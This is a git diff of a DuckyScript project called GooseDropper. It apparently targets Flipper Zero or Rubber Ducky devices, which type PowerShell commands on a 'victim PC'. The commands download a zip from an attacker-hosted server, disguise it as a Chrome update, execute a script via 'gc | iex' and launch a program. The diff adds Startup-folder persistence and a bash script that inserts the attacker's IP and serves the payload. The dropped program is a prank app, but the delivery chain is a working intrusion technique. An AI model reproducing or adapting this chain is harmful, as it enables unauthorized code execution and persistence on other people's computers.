diff --git a/Duckyscripts/GooseDropper/GooseDropper.txt b/Duckyscripts/GooseDropper/GooseDropper.txt index 6a7cfce..13392f9 100644 --- a/Duckyscripts/GooseDropper/GooseDropper.txt +++ b/Duckyscripts/GooseDropper/GooseDropper.txt @@ -4,9 +4,9 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r DELAY 500 GUI r DELAY 500 -STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip +STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip ENTER -DELAY 5000 +DELAY 8000 GUI r DELAY 500 STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update @@ -14,5 +14,10 @@ ENTER DELAY 3000 GUI r DELAY 500 +STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex +ENTER +DELAY 1000 +GUI r +DELAY 500 STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe ENTER diff --git a/Duckyscripts/GooseDropper/PersistentGoose.ps1 b/Duckyscripts/GooseDropper/PersistentGoose.ps1 new file mode 100644 index 0000000..94e731b --- /dev/null +++ b/Duckyscripts/GooseDropper/PersistentGoose.ps1 @@ -0,0 +1,6 @@ +$WScriptShell = New-Object -ComObject WScript.Shell +$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe" +$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk" +$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) +$Shortcut.TargetPath = $TargetFile +$Shortcut.Save() \ No newline at end of file diff --git a/Duckyscripts/GooseDropper/README.md b/Duckyscripts/GooseDropper/README.md index 3f8b63b..32c8114 100644 --- a/Duckyscripts/GooseDropper/README.md +++ b/Duckyscripts/GooseDropper/README.md @@ -1,23 +1,27 @@ -======= Goose Dropper ======== +**======= Goose Dropper v2.0 ========** -This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose on a Windows PC. +This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE** + +------------------------------------------------------------------------------------------------------ Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: - 1) Replace the YOUR_IP value in GooseDropper.txt with your IP + 1) Replace the YOUR_IP value in GooseDropper.txt with your IP. - 2) Download Desktop Goose and extract it, rename the DesktopGoose v.031 from inside the zip to Update - - 3) Re-ZIP the Update directory and name it Chrome_Updater.txt - - 4) Start some form of simple webserver/fileshare on port 1337 - - 5) Copy to your Flipper or Rubber-Ducky and PWN! + 2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update. -Important Notes: + 3) Copy PersistentGoose.ps1 into the newly renamed Update folder. + + 4) Re-ZIP the Update directory and name it Chrome_Updater.txt. + + 5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice). + + 6) Copy to your Flipper or Rubber-Ducky and PWN! + +-------------------------------------------------------------------------------------------------------------- + +**Important Notes:** Ensure configuration is run while on the same network as your target, re-configure with each new network. -Currently a reboot will kill the process, however persistance is being worked on. - All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 55da368..5c9a65f 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -1,15 +1,44 @@ #!/bin/bash -#Grab your local IP to add to the payload -SRC="$(ip route show | grep default | cut -d ' ' -f 9)" +#Determine the source of the DesktopGoose download +echo "1) Local Webserver | 2) Persistant URL" + +read -p "Select a download source [1/2]: " DL + +if [ "${DL}" == "1" ]; +then + echo "Grabbing your IP" + + #Grab your local IP to add to the payload + SRC="$(ip route show | grep default | cut -d ' ' -f 9)" + + #Add your IP to the payload + sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt + + sleep 5s && clear + +elif [ "${DL}" == "2" ]; +then + #Get your URL + read -p "Enter your URL: " SRC + + #Add your URL to the payload + sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + + #Remind users to have the zip ready + echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" + + sleep 5s && clear + +else + echo "Please enter a valid selection" + exit + +fi #Check if Desktop Goose is present in this directory GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" -#Add the IP to the payload -sed -i "s/YOUR_IP/$SRC/" GooseDroper.txt - -#Check if [ "${GOOSE}" == "" ]; then echo "Desktop Goose is not present in this directory, download it, or move it here" @@ -18,16 +47,36 @@ then else unzip "Desktop Goose v0.31.zip" mv "Desktop Goose v0.31/DesktopGoose v0.31" Update + mv PersistentGoose.ps1 Update/ zip -r Chrome_Update.zip Update rm -rf "Desktop Goose v0.31"* Update - read -p "Configuration finished! Start python webserver now? [Y/N]" START + clear fi +read -p "Configure Persistence? [Y/N]: " PERSIST + +if [ "${PERSIST,,}" == "n" ]; +then + sed -i "15d;16d;17d;18d;19d" GooseDropper.txt +else + break +fi + +if [ "${DL}" == "1" ]; +then + clear + read -p "Configuration finished! Start python webserver now? [Y/N]: " START + clear +else + clear + break +fi if [ "${START,,}" == "y" ]; then + echo "Starting Server... Happy PWNing! (don't be a skid)" python3 -m http.server 1337 && echo "PWNED!" else clear - echo "Server not started, thank you!" + echo "Finished... Happy PWNing (don't be a skid)!" fi diff --git a/Duckyscripts/GooseDropper/testing/.gitignore b/Duckyscripts/GooseDropper/testing/.gitignore new file mode 100644 index 0000000..e69de29 diff --git a/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip new file mode 100644 index 0000000..646ca9b Binary files /dev/null and b/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip differ diff --git a/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk b/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk new file mode 100644 index 0000000..13392f9 --- /dev/null +++ b/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk @@ -0,0 +1,23 @@ +REM TITLE GooseDropper +REM AUTHOR Fr3ki +REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC +DELAY 500 +GUI r +DELAY 500 +STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip +ENTER +DELAY 8000 +GUI r +DELAY 500 +STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update +ENTER +DELAY 3000 +GUI r +DELAY 500 +STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex +ENTER +DELAY 1000 +GUI r +DELAY 500 +STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe +ENTER diff --git a/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk b/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk new file mode 100644 index 0000000..94e731b --- /dev/null +++ b/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk @@ -0,0 +1,6 @@ +$WScriptShell = New-Object -ComObject WScript.Shell +$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe" +$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk" +$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) +$Shortcut.TargetPath = $TargetFile +$Shortcut.Save() \ No newline at end of file diff --git a/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip new file mode 100644 index 0000000..646ca9b Binary files /dev/null and b/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip differ diff --git a/Duckyscripts/GooseDropper/testing/recover.sh b/Duckyscripts/GooseDropper/testing/recover.sh new file mode 100644 index 0000000..3cc35ef --- /dev/null +++ b/Duckyscripts/GooseDropper/testing/recover.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +cp PersistentGoose.ps1.bk PersistentGoose.ps1 +cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip" +cp GooseDropper.txt.bk GooseDropper.txt +rm Chrome_Update.zip